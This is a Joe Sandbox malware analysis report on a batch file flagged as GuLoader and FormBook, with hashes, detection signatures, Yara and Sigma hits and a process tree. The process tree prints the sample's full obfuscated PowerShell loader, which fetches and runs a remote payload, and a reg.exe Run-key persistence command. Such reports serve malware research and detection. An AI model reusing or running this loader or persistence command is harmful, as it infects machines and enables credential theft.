Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDHL_PT563857935689275783656385FV-GDS3535353.bat

Overview

General Information

Sample name:rDHL_PT563857935689275783656385FV-GDS3535353.bat
Analysis ID:1473659
MD5:60186cd9a2e82835bc143c1fb4662b7e
SHA1:880c7f14743f9759b30bcc28085949122f54c20e
SHA256:b66081b0e5dfe21e03d1043700d7c05e65bda96ad33a6370c374217d5ae84405
Tags:bat
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6716 cmdline: powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5824 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6988 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6740 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 6020 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 3732 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5936 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1408f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 5 entries

          Other

          SourceRuleDescriptionAuthorStrings
          amsi64_6716.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_6988.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xe12d:$b2: ::FromBase64String(
            • 0xd1c0:$s1: -join
            • 0x696c:$s4: +=
            • 0x6a2e:$s4: +=
            • 0xac55:$s4: +=
            • 0xcd72:$s4: +=
            • 0xd05c:$s4: +=
            • 0xd1a2:$s4: +=
            • 0x16c77:$s4: +=
            • 0x16cf7:$s4: +=
            • 0x16dbd:$s4: +=
            • 0x16e3d:$s4: +=
            • 0x17013:$s4: +=
            • 0x17097:$s4: +=
            • 0xd9d4:$e4: Get-WmiObject
            • 0xdbc3:$e4: Get-Process
            • 0xdc1b:$e4: Start-Process
            • 0x1791c:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6020, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 3732, ProcessName: cmd.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scleroconjunctival
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3732, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 5936, ProcessName: reg.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6020, ParentProcessName: 